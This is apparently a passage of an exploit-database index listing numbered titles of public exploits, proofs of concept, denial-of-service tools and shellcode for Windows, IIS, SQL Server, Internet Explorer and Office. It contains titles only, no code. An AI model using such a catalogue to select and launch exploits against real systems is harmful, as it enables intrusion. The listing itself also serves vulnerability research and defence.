[21746] MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (1) [21721] Microsoft Internet Explorer 4/5/6 XML Datasource Applet File Disclosure Vulnerability [21718] Microsoft SQL 2000/7.0 Agent Jobs Privilege Elevation Vulnerability [21711] Microsoft Outlook Express 5/6 MHTML URL Handler File Rendering Vulnerability [21705] Microsoft Internet Explorer 6.0 File Attachment Script Execution Vulnerability [21703] Citrix Metaframe for Windows NT 4.0 TSE 1.8 Java ICA Environment DoS [21693] Microsoft SQL Server 2000 User Authentication Remote Buffer Overflow Vulnerability [21691] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (8) [21690] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (7) [21689] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (6) [21688] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (5) [21687] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (4) [21686] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (3) [21685] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (2) [21684] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (1) [21662] Microsoft Outlook Express 6 XML File Attachment Script Execution Vulnerability [21652] Microsoft SQL Server 2000 Resolution Service Heap Overflow Vulnerability [21651] Microsoft SQL Server 2000 sp_MScopyscript SQL Injection Vulnerability [21650] Microsoft SQL Server 2000 Database Consistency Checkers Buffer Overflow Vulnerability [21631] Microsoft Outlook Express 5/6 Spoofable File Extensions Vulnerability [21625] Trend Micro InterScan VirusWall for Windows NT 3.52 Space Gap Scan Bypass [21613] Microsoft IIS 4/5 SMTP Service Encapsulated SMTP Address Vulnerability [21601] Microsoft Foundation Class Library 7.0 ISAPI Buffer Overflow Vulnerability [21556] Microsoft Internet Explorer 5/6 CSSText Bold Font Denial of Service [21555] Cisco Secure ACS for Windows NT 3.0 Cross-site Scripting Vulnerability [21549] Microsoft SQL Server 2000 Password Encrypt Procedure Buffer Overflow Vulnerability [21541] Microsoft SQL Server 2000 SQLXML Script Injection Vulnerability [21540] Microsoft SQL Server 2000 SQLXML Buffer Overflow Vulnerability [21530] Seanox DevWex Windows Binary 1.2002.520 File Disclosure [21481] Microsoft MSN Messenger 1-4 Malformed Invite Request Denial of Service [21452] Microsoft Internet Explorer 5.0.1/6.0 Content-Disposition Handling File Execution Vulnerability [21419] Microsoft Outlook Express 5.5 DoS Device Denial of Service Vulnerability [21404] Microsoft Internet Explorer 5/6 Self-Referential Object Denial of Service Vulnerability [21387] WebTrends Reporting Center for Windows 4.0 d GET Request Buffer Overflow [21385] Microsoft IIS 5.0 CodeBrws.ASP Source Code Disclosure Vulnerability [21376] Microsoft Internet Explorer 5.5/6.0 History List Script Injection Vulnerability [21372] Microsoft IIS 4/5 HTTP Error Page Cross Site Scripting Vulnerability [21371] Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (4) [21370] Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (3) [21369] Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (2) [21368] Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (1) [21361] Microsoft Internet Explorer 5 Cascading Style Sheet File Disclosure Vulnerability [21313] Microsoft IIS 4.0/5.0/5.1 Authentication Method Disclosure Vulnerability [21260] Microsoft Site Server 3.0 Cross-Site Scripting Vulnerability [21225] John Roy Pi3Web 2.0 For Windows Long Request Buffer Overflow Vulnerability [21199] Microsoft Internet Explorer 5 JavaScript Local File Enumeration Vulnerability (2) [21198] Microsoft Internet Explorer 5 JavaScript Local File Enumeration Vulnerability (1) [21195] Microsoft Internet Explorer 5/6 GetObject File Disclosure Vulnerability [21189] Windows 98/XP/ME UPnP NOTIFY Buffer Overflow Vulnerability (2) [21188] Windows 98/XP/ME UPnP NOTIFY Buffer Overflow Vulnerability (1) [21177] Microsoft IIS 5.0 False Content-Length Field DoS Vulnerability [21164] Microsoft Internet Explorer 5.5/6.0 Spoofable File Extensions Vulnerability [21144] Microsoft Internet Explorer 5/6 Cookie Disclosure/Modification Vulnerability [21127] Microsoft Internet Explorer 5/6 JavaScript Interface Spoofing Vulnerability [21118] Microsoft Internet Explorer 5 Zone Spoofing Vulnerability [21113] Microsoft Index Server 2.0 File Information and Path Disclosure Vulnerability [21072] Microsoft IIS 5.0 In-Process Table Privelege Elevation Vulnerability [21071] Microsoft IIS 4/5 SSI Buffer Overrun Privelege Elevation [21040] Windows 98 ARP Denial of Service Vulnerability [21004] Microsoft Outlook 98/2000/2002 Arbitrary Code Execution Vulnerability [21003] Microsoft Outlook 98/2000/2002 Unauthorized Email Access Vulnerability [20997] HP-UX 11,Linux kernel 2.4,Windows 2000/NT 4.0,IRIX 6.5 Small TCP MSS DoS [20991] Microsoft IIS 4.0/5.0 Device File Remote DoS Vulnerability [20989] Microsoft IIS 4.0/5.0 Device File Local DoS Vulnerability [20912] Trend Micro InterScan VirusWall for Windows NT 3.51 Configurations Modification Vulnerability [20903] Microsoft Internet Explorer 5.5 File Disclosure Vulnerability [20899] Microsoft Outlook 97/98/2000/4/5 Address Book Spoofing Vulnerability [20893] Trend Micro InterScan VirusWall for Windows NT 3.4/3.5/3.51 Remote Reconfiguration Vulnerability [20880] MS Windows 2000 Debug Registers Vulnerability [20846] Microsoft IIS 4.0/5.0 FTP Denial of Service Vulnerability [20818] Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (4) [20817] Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (3) [20816] Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (2) [20815] Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (1) [20814] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (5) [20813] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (4) [20812] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (3) [20811] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (2) [20810] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (1) [20802] Microsoft IIS 2.0/3.0 Long URL Denial of Service Vulnerability [20782] Microsoft IE 5.0/5.5 and OE 5.5 XML Stylesheets Active Scripting Vulnerability [20770] GoAhead Software GoAhead Webserver (Windows) 2.1 - Denial of Service [20763] Microsoft ISA Server 2000 Web Proxy DoS Vulnerability [20688] Qualcomm Eudora 5.0.2 'Use Microsoft Viewer' Code Execution Vulnerability [20680] Microsoft IE 5.0.1/5.5/6.0 Telnet Client File Overwrite Vulnerability [20664] Microsoft IIS 5.0 WebDAV Denial of Service Vulnerability [20605] Apple Quicktime plugin - Windows 4.1.2 (Japanese) Remote Overflow Vulnerability [20590] Microsoft IIS 3.0/4.0 Upgrade BDIR.HTR Vulnerability [20571] Microsoft Outlook 2000 0/98 0/Express 5.5 Concealed Attachment Vulnerability [20543] Windows Service Trusted Path Privilege Escalation [20515] Microsoft Internet Explorer 5.0.1/5.5 'mstask.exe' CPU Consumption Vulnerability [20508] Microsoft NT 4.0 RAS/PPTP Malformed Control Packet Denial of Service Attack [20481] Microsoft IIS 2.0/3.0 Appended Dot Script Source Disclosure Vulnerability [20472] IBM DB2 Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password Vulnerability [20470] IBM DB2 Universal Database for Windows NT 6.1/7.1 SQL DoS Vulnerability [20459] Microsoft Internet Explorer 5 \'INPUT TYPE=FILE\' Vulnerability [20457] Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_peekqueue Buffer Overflow Vulnerability [20456] Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_showcolv Buffer Overflow Vulnerability [20451] Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_displayparamstmt Buffer Overflow Vulnerability [20440] "Windows 3.11/95/NT 4.0/NT 3.5.1 ""Out Of Band"" Data Denial of Service (4)" [20439] "Windows 3.11/95/NT 4.0/NT 3.5.1 ""Out Of Band"" Data Denial of Service (3)" [20438] "Windows 3.11/95/NT 4.0/NT 3.5.1 ""Out Of Band"" Data Denial of Service (2)" [20437] "Windows 3.11/95/NT 4.0/NT 3.5.1 ""Out Of Band"" Data Denial of Service (1)" [20426] Microsoft Internet Explorer 5.5 Index.dat Vulnerability [20384] Microsoft IIS 4.0/5.0 Executable File Parsing Vulnerability [20383] Microsoft IIS 4.0 ISAPI Buffer Overflow Vulnerability [20324] iplanet certificate management system 4.2 for windows nt 4.0 - Directory Traversal [20310] Microsoft IIS 4.0 Pickup Directory DoS Vulnerability [20309] Microsoft IIS 3.0 newdsn.exe File Creation Vulnerability [20306] Microsoft Virtual Machine Arbitrary Java Codebase Execution Vulnerability [20305] Microsoft Site Server 2.0 with IIS 4.0 - File Upload Vulnerability [20289] Microsoft NetMeeting 3.0.1 4.4.3385 Remote Desktop Sharing DoS Vulnerability [20269] Microsoft IIS 5.0 Indexed Directory Disclosure Vulnerability [20235] Cisco Secure ACS for Windows NT 2.42 Buffer Overflow Vulnerability [20232] MS Windows 2000/NT 4 DLL Search Path Weakness [20219] WebTV for Windows 98/ME DoS Vulnerability [20174] Microsoft Internet Explorer Fixed Table Col Span Heap Overflow [20152] "Microsoft IIS 5.0 ""Translate: f"" Source Disclosure Vulnerability (2)" [20151] "Microsoft IIS 5.0 ""Translate: f"" Source Disclosure Vulnerability (1)" [20122] Microsoft Office SharePoint Server 2007 Remote Code Execution [20096] Microsoft IIS 2.0/3.0/4.0/5.0/5.1 Internal IP Address Disclosure Vulnerability [20089] Microsoft IIS 4.0/5.0 Source Fragment Disclosure Vulnerability [20079] Microsoft Outlook 97/98/2000, Outlook Express 4.0/5.0 GMT Field Buffer Overflow (2) [20078] Microsoft Outlook 97/98/2000, Outlook Express 4.0/5.0 GMT Field Buffer Overflow (1) [20006] Windows NT 4.0 - Remote Registry Request Dos Vulnerability (2) [20005] Windows NT 4.0 - Remote Registry Request Dos Vulnerability (1) [19968] Windows 2000/95/98/NT 4.0 Long Filename Extension Vulnerability [19930] Windows Escalate Task Scheduler XML Privilege Escalation [19928] Microsoft Active Movie Control 1.0 Filetype Vulnerability [19908] Microsoft IIS 4.0/5.0 Malformed Filename Request Vulnerability [19907] Microsoft IIS 4.0/5.0 Malformed File Extension DoS Vulnerability [19830] Microsoft Index Server 2.0 '%20' ASP Source Disclosure Vulnerability [19827] NT 4.0 / Windows 2000 TCP/IP Printing Service DoS Vulnerability [19815] vqsoft vqserver for windows 1.9.9 - Directory Traversal vulnerability [19799] Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 MS DoS Device Name DoS [19789] Microsoft Clip Art Gallery 5.0 - Buffer Overflow Vulnerability [19743] Cat Soft Serv-U 2.5/a/b,Windows 2000/95/98/NT 4.0 Shortcut Vulnerability [19742] microsoft iis 3.0/4.0,microsoft index server 2.0 - Directory Traversal [19734] Microsoft Virtual Machine 2000 Series/3000 Series getSystemResource Vulnerability [19733] McAfee 4.0,Network Associates for Windows NT 4.0.2/4.0.3 a,Norton AntiVirus 2000 Recycle Bin Exclusion [19728] Microsoft Systems Management Server 2.0 Default Permissions Vulnerability [19638] Microsoft SQL Server 7.0/7.0 SP1 NULL Data DoS Vulnerability [19637] MS IE 5.0 for Windows 2000/95/98/NT 4 XML HTTP Redirect Vulnerability [19633] Windows 95/98/Enterprise Server 4/NT Server 4/Terminal Server 4/Workstation 4 Riched Buffer Overflow [19608] Windows 95/98 UNC Buffer Overflow Vulnerability (2) [19607] Windows 95/98 UNC Buffer Overflow Vulnerability (1) [19594] MS Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Spoolss.exe DLL Insertion Vulnerability [19516] Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow [19515] MS IE 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow [19473] Microsoft Internet Explorer 5.0 FTP Password Storage Vulnerability [19471] Microsoft Internet Explorer 5.0 HTML Form Control DoS [19445] Microsoft FrontPage Personal WebServer 1.0 PWS DoS Vulnerability [19435] Microsoft JET 3.5/3.51/4.0 VBA Shell Vulnerability [19425] Microsoft Data Access Components (MDAC) <= 2.1,Microsoft IIS 3.0/4.0,Microsoft Index Server 2.0,Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (2) [19424] Microsoft Data Access Components (MDAC) <= 2.1,Microsoft IIS 3.0/4.0,Microsoft Index Server 2.0,Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (1) [19415] Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (3) [19414] Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (2) [19413] Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (1) [19376] Microsoft IIS 2.0/3.0/4.0 ISAPI GetExtensionVersion() Vulnerability [19361] Microsoft IIS 3.0/4.0 Double Byte Code Page Vulnerability [19248] Microsoft IIS 4.0 - Buffer Overflow Vulnerability (4) [19247] Microsoft IIS 4.0 - Buffer Overflow Vulnerability (3) [19246] Microsoft IIS 4.0 - Buffer Overflow Vulnerability (2) [19245] Microsoft IIS 4.0 - Buffer Overflow Vulnerability (1) [19228] Microsoft IIS 4.0,Microsoft JET 3.5/3.5.1 Database Engine VBA Vulnerability [19208] Microsoft Site Server Commerce Edition 3.0 alpha AdSamples Vulnerability [19207] Microsoft Outlook Express 4.27.3110/4.72.3120 POP Denial of Service Vulnerability [19194] Microsoft IIS 3.0/4.0 Using ASP And FSO To Read Server Files Vulnerability [19186] Microsoft XML Core Services MSXML Uninitialized Memory Corruption [19164] Microsoft IE4 Clipboard Paste Vulnerability [19156] Microsoft Internet Explorer 5.0.1 Invalid Byte Cross-Frame Access Vulnerability [19152] Microsoft IIS 5.0 IISAPI Extension Enumerate Root Web Server Directory Vulnerability [19144] Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 Backdoor Vulnerability [19129] Microsoft IIS 4.0,Microsoft Site Server 3.0 Showcode ASP Vulnerability [19118] Microsoft IIS 3.0/4.0,Microsoft Personal Web Server 2.0/3.0/4.0 ASP Alternate Data Streams Vulnerability [19089] Windows OpenType Font - File Format DoS Exploit [19083] Cheyenne Inoculan for Windows NT 4.0 Share Vulnerability [19037] MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability [19033] microsoft iis 6.0 and 7.5 - Multiple Vulnerabilities [19026] Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow [18952] Microsoft Wordpad 5.1 (.doc) Null Pointer Dereference Vulnerability [18894] Windows XP Keyboard Layouts Pool Corruption LPE 0day PoC (post-MS12-034) [18759] TFTP Server for Windows 1.4 ST WRQ Buffer Overflow [18606] Microsoft Terminal Services Use After Free (MS12-020) [18365] Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability [18334] Microsoft Office 2003 Home/Pro 0day [18272] Windows Explorer Denial of Service (DOS) [18271] Windows Media Player 11.0.5721.5262 - Remote Denial of Service (DOS) [18143] MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow [18087] MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow [18078] Microsoft Excel 2003 11.8335.8333 Use After Free [18067] Microsoft Excel 2007 SP2 Buffer Overwrite Exploit [17830] Microsoft WINS Service <= 5.2.3790.4520 Memory Corruption [17796] Windows Server 2008 R1 Local Denial of Service [17783] ZipX for Windows 1.71 ZIP File - Buffer Overflow Exploit [17659] MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow [17476] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS [MS09-053] [17451] Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability [17399] Microsoft Office XP Remote code Execution [17398] Windows Media Player with K-Lite Codec Pack DoS PoC [17227] Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow PoC [17164] Microsoft Reader <= 2.1.1.3143 NULL Byte Write [17163] Microsoft Reader <= 2.1.1.3143 Array Overflow [17162] Microsoft Reader <= 2.1.1.3143 Integer Overflow [17161] Microsoft Reader <= 2.1.1.3143 Heap Overflow [17160] Microsoft Reader <= 2.1.1.3143 Integer Overflow [17159] Microsoft Host Integration Server <= 8.5.4224.0 DoS Vulnerabilities [17158] Microsoft HTML Help <= 6.1 Stack Overflow [17072] Windows Explorer 6.0.2900.5512 (Shmedia.dll 6.0.2900.5512) AVI Preview DoS PoC [16991] Microsoft Source Code Analyzer for SQL Injection 1.3 Improper Permissions [16750] Microsoft Message Queueing Service DNS Name Path Overflow [16749] Microsoft RPC DCOM Interface Overflow [16748] Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP) [16747] Microsoft Message Queueing Service Path Overflow [16740] Microsoft IIS FTP Server NLST Response Overflow [16698] Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) [16686] Microsoft Word RTF pFragments Stack Buffer Overflow (File Format) [16680] Microsoft Visual Basic VBP Buffer Overflow [16665] Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow [16649] Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit [16625] Microsoft Excel Malformed FEATHEADER Record Vulnerability [16615] Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption [16612] Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution [16608] Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow [16605] Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download [16545] Microsoft Help Center XSS and Command Execution [16542] Microsoft OWC Spreadsheet HTMLURL Buffer Overflow [16537] Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption [16526] Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) [16521] Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow [16516] Microsoft WMI Administration Tools ActiveX Buffer Overflow [16507] Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow [16472] Microsoft IIS 5.0 IDQ Path Overflow [16471] Microsoft IIS WebDAV Write Access Code Execution [16470] Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow [16469] Microsoft IIS 5.0 Printer Host Header Overflow [16468] Microsoft IIS 4.0 .HTR Path Overflow [16467] Microsoft IIS/PWS CGI Filename Double Decode Command Execution [16442] Microsoft DirectX DirectShow SAMI Buffer Overflow [16427] Windows RSH daemon Buffer Overflow [16403] CA BrightStor Agent for Microsoft SQL Overflow [16398] Microsoft SQL Server Hello Overflow [16396] Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection [16395] Microsoft SQL Server Payload Execution [16394] Microsoft SQL Server Payload Execution via SQL injection [16393] Microsoft SQL Server Resolution Overflow [16392] Microsoft SQL Server sp_replwritetovarbin Memory Corruption [16379] Microsoft Outlook Express NNTP Response Parsing Buffer Overflow [16378] Microsoft Workstation Service NetAddAlternateComputerName Overflow [16377] Microsoft ASN.1 Library Bitstring Heap Overflow [16375] Microsoft RRAS Service RASMAN Registry Overflow [16373] Microsoft Services MS06-066 nwapi32.dll [16372] Microsoft Workstation Service NetpManageIPCConnect Overflow [16371] Microsoft NetDDE Service Overflow [16369] Microsoft Services MS06-066 nwwks.dll [16368] Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow [16367] Microsoft Server Service NetpwPathCanonicalize Overflow [16366] Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB) [16365] Microsoft Plug and Play Service Overflow [16364] Microsoft RRAS Service Overflow [16362] Microsoft Server Service Relative Path Stack Corruption [16361] Microsoft Print Spooler Service Impersonation Vulnerability [16359] Microsoft WINS Service Memory Overwrite [16358] Microsoft IIS ISAPI RSA WebAgent Redirect Overflow [16357] Microsoft IIS Phone Book Service Overflow [16356] Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow [16355] Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow [16354] Microsoft IIS ISAPI w3who.dll Query String Overflow [16334] Microsoft Private Communications Transport Overflow [16333] Windows Media Services ConnectFunnel Stack Buffer Overflow [16332] Veritas Backup Exec Windows Remote Agent Overflow [16262] MS Windows XP - WmiTraceMessageVa Integer Truncation Vulnerability PoC (MS11-011) [16166] MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow [16071] Microsoft Internet Explorer MHTML Protocol Handler XSS [16024] Microsoft Fax Cover Page Editor <= 5.2.3790.3959 Double Free Memory Corruption [15984] MS11-002: Microsoft Data Access Components Vulnerability [15963] MS10-081: Windows Common Control Library (Comctl32) Heap Overflow [15894] MS10-073 Windows Class Handling Vulnerability [15803] Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC [15758] Windows Win32k Pointer Dereferencement PoC (MS10-098) [15609] Elevation of privileges under Windows Vista/7 (UAC Bypass) 0day [15589] Windows Task Scheduler Privilege Escalation 0day [15319] Apache 2.2 (Windows) Local Denial of Service [15297] Windows Mobile 6.1 and 6.5 Double Free Denial of Service [15266] Windows NTLM Weak Nonce Vulnerability [15262] Microsoft Office HtmlDlgHelper Class Memory Corruption [15167] Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) Denial of Service (MS10-065) [15158] MOAUB #30 - Microsoft Unicode Scripts Processor Remote Code Execution [15148] MOAUB #29 - Microsoft Excel SxView Record Parsing Heap Memory Corruption [15136] Windows Mobile 6.5 TR Phone Call Shellcode [15122] MOAUB #27 - Microsoft Internet Explorer MSHTML Findtext Processing Issue [15116] Windows Mobile 6.5 TR (WinCE 5.2) MessageBox Shellcode (ARM) [15112] MOAUB #26 - Microsoft Cinepak Codec CVDecompress Heap Overflow [15096] MOAUB #24 - Microsoft MPEG Layer-3 Audio Decoder Division By Zero [15094] MOAUB #24 - Microsoft Excel OBJ Record Stack Overflow [15088] MOAUB #23 - Microsoft Excel HFPicture Record Parsing Memory Corruption (0day) [15065] MOAUB #21 - Microsoft Excel WOPT Record Parsing Heap Memory Corruption [15061] microsoft drm technology (msnetobj.dll) activex Multiple Vulnerabilities [15034] Microsoft Mspaint bmp crash Proof Of Concept [15019] MOAUB #16 - Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability [14971] MOAUB #11 - Microsoft Office Word 2007 sprmCMajority Buffer Overflow [14944] MOAUB #8 - Microsoft Office Visio DXF File Stack based Overflow [14895] MOAUB #5 - Microsoft MPEG Layer-3 Remote Command Execution Exploit [14782] Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll) [14780] Windows Internet Communication Settings DLL Hijacking Exploit (schannel.dll) [14758] Microsoft Group Convertor DLL Hijacking Exploit (imm.dll) [14754] Microsoft Internet Connection Signup Wizard DLL Hijacking Exploit (smmscrpt.dll) [14751] Microsoft Vista BitLocker Drive Encryption API Hijacking Exploit (fveapi.dll) [14746] Microsoft Office Groove 2007 DLL Hijacking Exploit (mso.dll) [14745] Microsoft Address Book 6.00.2900.5512 DLL Hijacking Exploit (wab32res.dll) [14744] Microsoft Visio 2003 DLL Hijacking Exploit (mfc71enu.dll) [14728] Windows Live Email DLL Hijacking Exploit (dwmapi.dll) [14723] Microsoft Power Point 2010 DLL Hijacking Exploit (pptimpconv.dll) [14697] Windows XP SP3 English MessageBoxA Shellcode - 87 bytes [14613] Windows Live Messenger <= 14.0.8117 Animation Remote Denial of Service [14607] Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054) [14413] IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control [14361] Microsoft Excel 0x5D record Stack Overflow Vulnerability [14295] Microsoft MSHTML.DLL CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak (0day) [14179] Microsoft Internet Information Services (IIS) 5 Authentication Bypass Vulnerability (MS10-065) [14156] Windows Vista/Server 2008 NtUserCheckAccessForIntegrityLevel Use-after-free Vulnerability [13729] Windows Seven x64 (cmd) Shellcode 61 Bytes [13719] Windows Seven Pro SP1 64 Fr (Beep) Shellcode 39 Bytes [13639] Windows XP Professional SP2 ita calc.exe shellcode 36 bytes [13631] Windows XP Home Edition SP3 English (calc.exe) 37 bytes [13630] Windows Xp Home Edition SP2 English (calc.exe) 37 bytes [13582] "Windows XP Pro Sp2 English ""Wordpad"" Shellcode" [13581] "Windows XP Pro Sp2 English ""Message-Box"" Shellcode" [13532] MS Windows (DCOM RPC2) Universal Shellcode [13531] windows/XP-sp1 portshell on port 58821 116 bytes [13530] windows/XP download and exec source [13527] Windows 9x/NT/2k/XP PEB method 35 bytes [13526] Windows 9x/NT/2k/XP PEB method 31 bytes [13525] Windows 9x/NT/2k/XP PEB method 29 bytes [13524] Windows 9x/NT/2k/XP Reverse Generic Shellcode without Loader 249 bytes [13523] Windows NT/2k/XP useradd shellcode for russian systems 318 bytes [13504] Windows x86 null-free bindshell for Windows 5.0-7.0 all service packs [13283] windows xp/sp1 generate portbind payload [12728] Microsoft Outlook Web Access (OWA) 8.2.254.0 - Information Disclosure vulnerability [12524] Windows SMB2 Negotiate Protocol (0x72) Response DoS [12518] Microsoft Paint Integer Overflow Vulnerability (DoS) MS10-005 [12450] Microsoft SharePoint Server 2007 XSS Vulnerability [12337] Windows 2000/XP/2003 win32k.sys SfnINSTRING local kernel Denial of Service Vulnerability [12336] Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY local kernel Denial of Service Vulnerability [12273] Windows 7/2008R2 SMB Client Trans2 Stack Overflow 10-020 PoC [12119] WINDOWS FTP SERVER by DWG (Auth Bypass) [12079] Microsoft Office (2010 beta) Communicator SIP Denial of Service Exploit [12032] Microsoft Internet Explorer Tabular Data Control ActiveX Remote Code Execution [11683] Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta) [11531] Windows Media Player 11.0.5721.5145 (.mpg) Buffer Overflow Exploit [11276] Microsoft Internet Explorer 6.0/7.0 NULL pointer crashes [11214] Windows Live Messenger 2009 ActiveX Heap Overflow PoC [11199] Windows NT User Mode to Ring 0 Escalation Vulnerability [11070] Windows Live Messenger 2009 ActiveX DoS Vulnerability [11034] Microsoft HTML Help Compiler (hhc.exe) BOF PoC [10791] Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x [10747] Mini-Stream Exploit for Windows XP SP2 and SP3 [10375] SAP GUI for Windows sapirrfc.dll Activex Overflow Exploit [10005] Windows 7 / Server 2008R2 Remote Kernel Crash [9893] Microsoft Internet Explorer 5,6,7 - Memory Corruption PoC [9596] SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH) [9594] Windows Vista/7 SMB2.0 Negotiate Protocol Request Remote BSOD Vuln [9592] SIDVault 2.0e Windows Remote Buffer Overflow Exploit (meta) [9587] Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service [9586] SIDVault 2.0e Windows Remote Buffer Overflow Exploit [9559] Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4) [9541] Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k) [9516] Novell Client for Windows 2000/XP ActiveX Remote DoS Vulnerability [9417] MS Windows 2003 (EOT File) BSOD Crash Exploit [9163] Microsoft Office Web Components (Spreadsheet) ActiveX BOF PoC [9117] HTC / Windows Mobile OBEX FTP Service Directory Traversal Vuln [9100] Microsoft Internet Explorer (AddFavorite) Remote Crash PoC [9093] windows live messenger plus! fileserver 1.0 - Directory Traversal vuln [8832] ICQ 6.5 URL Search Hook (Windows Explorer) Remote BOF PoC [8806] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (pl) [8765] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php) [8754] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch) [8704] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Vulnerability [8467] Microsoft Media Player - (quartz.dll .wav) Multiple Remote DoS Vulns [8466] Microsoft GDI Plugin .png Infinite Loop Denial of Service PoC [8465] Microsoft Media Player - (quartz.dll .mid) Denial of Service Exploit [8445] MS Windows Media Player (.mid File) Integer Overflow PoC [8281] Microsoft GdiPlus EMF GpFont.SetData Integer Overflow PoC [7910] WOW - Web On Windows ActiveX Control 2 Remote Code Execution [7727] Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit [7720] MS Windows (.CHM File) Denial of Service (html compiled) [7585] MS Windows Media Player - (.WAV) Remote Crash PoC [7501] Microsoft SQL Server sp_replwritetovarbin() Heap Overflow Exploit [7262] Microsoft Office Communicator (SIP) Remote Denial of Service Exploit [7217] Quicksilver Forums <= 1.4.2 RCE Exploit (windows only) [7196] Microsoft XML Core Services DTD Cross-Domain Scripting PoC MS08-069 [7132] MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3) [7104] MS Windows Server Service Code Execution Exploit (MS08-067) [6841] MS Windows Server Service Code Execution Exploit (MS08-067) (Univ) [6824] MS Windows Server Service Code Execution PoC (MS08-067) [6757] MS Windows XP/2003 